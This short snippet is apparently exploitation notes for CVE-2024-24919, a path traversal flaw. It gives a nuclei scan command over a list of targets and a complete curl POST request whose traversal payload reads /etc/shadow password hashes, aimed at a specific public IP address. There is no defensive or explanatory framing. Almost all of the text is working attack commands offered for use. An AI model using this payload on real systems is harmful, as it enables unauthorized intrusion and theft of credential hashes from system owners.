nuclei -list chick.txt -t CVE-2024-24919.yaml
Replace with the target IP address, and this command will attempt to access the /etc/shadow file, which contains password hashes.
curl --path-as-is -i -s -k -X POST \ -H 'Host: 117.102.198.7 ' \ -H 'Content-Length: 39' \ -H 'Connection: keep-alive' \ --data-binary 'aCSHELL/../../../../../../../etc/shadow' \ 'https://117.102.198.7/clients/MyCRL'